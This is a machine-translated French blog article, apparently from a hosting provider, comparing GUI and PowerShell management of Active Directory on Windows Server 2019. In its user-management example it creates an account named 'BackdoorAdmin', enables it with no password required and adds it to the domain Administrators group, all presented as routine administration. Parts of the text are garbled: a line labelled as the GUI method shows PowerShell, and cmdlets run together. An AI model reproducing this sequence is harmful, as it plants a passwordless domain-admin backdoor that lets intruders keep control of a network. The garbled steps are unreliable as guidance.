Nous déployons Active Directory par toutes les méthodes possibles.

L'une des innovations vraiment utiles de Windows Server 2019 est la possibilité d'entrer sur les serveurs sans avoir à faire Sysprep ou une installation propre. Déployer une infrastructure sur des serveurs virtuels avec Windows Server n'a jamais été aussi simple.


Aujourd'hui, nous allons parler de la facilité d'installation et de gestion d'Active Directory via Powershell.

Définissez le rôle


RSAT ou serveur local avec GUI:


Vous devez d'abord ajouter le serveur à RSAT. Il est ajouté sur la page principale à l'aide d'un nom de domaine ou d'une adresse IP. Assurez-vous que vous entrez la connexion au format local\Administrator , sinon le serveur n'acceptera pas le mot de passe.


Accédez à ajouter des composants et sélectionnez AD DS.

Powershell:


Si vous ne connaissez pas le nom du composant système, vous pouvez exécuter la commande et obtenir une liste des composants disponibles, leurs dépendances et leurs noms.

 Get-WindowsFeature 


Copiez le nom du composant et poursuivez l'installation.

 Install-WindowsFeature -Name AD-Domain-Services 

Centre d'administration Windows:


Allez dans "Rôles et fonctionnalités" et sélectionnez ADDS (Services de domaine Active Directory).

Et c'est littéralement tout. Il n'est actuellement pas possible de gérer Active Directory via le Centre d'administration Windows. Sa mention n'est rien d'autre qu'un rappel de son inutilité jusqu'à présent.

Élever le serveur vers un contrôleur de domaine


Et pour cela, nous créons une nouvelle forêt.

RSAT ou serveurs GUI locaux:



Nous vous recommandons fortement de tout laisser par défaut, tous les composants hors de la boîte fonctionnent bien et ils n'ont pas besoin d'être touchés sans besoin particulier.

Powershell:

Vous devez d'abord créer une forêt et définir un mot de passe pour celle-ci. Powershell a un type de variable distinct pour les mots de passe - SecureString, qui est utilisé pour stocker en toute sécurité un mot de passe dans la RAM et le transférer en toute sécurité sur le réseau.


 $pass = Read-Host -AsSecureString 

Toute applet de commande qui utilise le mot de passe de quiconque doit être entrée de cette manière. Tout d'abord, écrivez le mot de passe dans SecureString, puis spécifiez cette variable dans l'applet de commande.


 Install-ADDSForest -DomainName test.domain -SafeModeAdministratorPassword $pass 

Comme dans l'installation via l'interface graphique, même la sortie vers la console est la même. Contrairement à un serveur avec une interface graphique, l'installation d'un rôle et l'installation d'un serveur en tant que contrôleur de domaine ne nécessitent pas de redémarrage.

L'installation du contrôleur à l'aide de RSAT prend plus de temps qu'à l'aide de Powershell.

Nous gérons le domaine


Maintenant, pour comprendre à quel point la gestion d'Active Directory diffère via Powershell et AD AC (Active Directory Administrative Center), considérons quelques exemples pratiques.

Créer un nouvel utilisateur


Supposons que nous voulons créer un utilisateur dans le groupe Utilisateurs et que nous lui définissions un mot de passe. Via AD AC, cela ressemble à ceci:


 New-ADUser -Name BackdoorAdmin -UserPrincipalName BackdoorAdmin@test Get-ADUser BackdoorAdmin 

Il n'y a aucune différence entre AD DC et Powershell.

Activer l'utilisateur


RSAT ou serveurs GUI locaux:


Grâce à l'interface graphique, l'utilisateur doit d'abord définir le mot de passe correspondant à l'objet de stratégie de groupe et seulement après cela, il peut être activé.

Powershell:


Powershell est presque la même chose, seul l'utilisateur peut être activé même sans mot de passe.

 Set-ADUser -Identity BackdoorAdmin -Enabled $true -PasswordNotRequired $true 

Ajouter un utilisateur au groupe


RSAT ou serveur local avec GUI:


À l'aide d'AD DC, vous devez accéder aux propriétés de l'utilisateur, rechercher la colonne avec l'appartenance utilisateur dans les groupes, rechercher le groupe dans lequel nous voulons le placer et l'ajouter enfin, puis cliquer sur OK.

Powershell:


Si nous ne connaissons pas le nom du groupe dont nous avons besoin, nous pouvons en obtenir la liste en utilisant:

 (Get-ADGroup -Server localhost -Filter *).name 

Vous pouvez obtenir un groupe avec toutes les propriétés comme ceci:


 Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} 

Enfin, ajoutez l'utilisateur au groupe:


De plus, étant donné que tout est un objet dans Powershell, nous, comme via AD DC, devons d'abord obtenir un groupe d'utilisateurs, puis l'ajouter.

 $user = Get-ADUser BackdoorAdmin 

Ajoutez ensuite cet objet au groupe:

 Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} | Add-ADGroupMember -Members $user 

Et vérifiez:

 Get-ADGroupMember -Identity Administrators 

Comme vous pouvez le voir, il n'y a presque aucune différence dans la gestion de AD via AD AC et Powershell.

Conclusion:


Si vous avez déjà rencontré le déploiement d'AD et d'autres services, vous avez peut-être remarqué les similitudes du déploiement via RSAT et Powershell, et à quoi tout ressemble vraiment. GUI dans le noyau, après tout.

Nous espérons que l'article a été utile ou intéressant.

Et enfin, quelques conseils pratiques:

  1. N'installez pas d'autres rôles sur un contrôleur de domaine.
  2. Utilisez BPA (Best practice analyzer) pour accélérer un peu le contrôleur
  3. N'utilisez pas l'administrateur Enterprice intégré, utilisez toujours votre propre compte.
  4. Lors du déploiement du serveur sur une adresse IP blanche, avec des ports redirigés ou sur VSD, assurez-vous de fermer le port 389, sinon vous deviendrez le point d'amplification des attaques DDoS.

Nous vous proposons également de lire nos articles précédents: une histoire sur la façon dont nous préparons les machines virtuelles clientes en utilisant l'exemple de notre tarif VDS Ultralight avec Server Core pour 99 roubles, comment travailler avec Windows Server 2019 Core et comment installer une interface graphique dessus , et comment gérer le serveur à l'aide de Windows Admin Centre comment installer Exchange 2019 sur Windows Server Core 2019

Nous proposons un tarif UltraLite Windows VDS mis à jour pour 99 roubles avec Windows Server 2019 Core installé.

Source: https://habr.com/ru/post/fr480776/


All Articles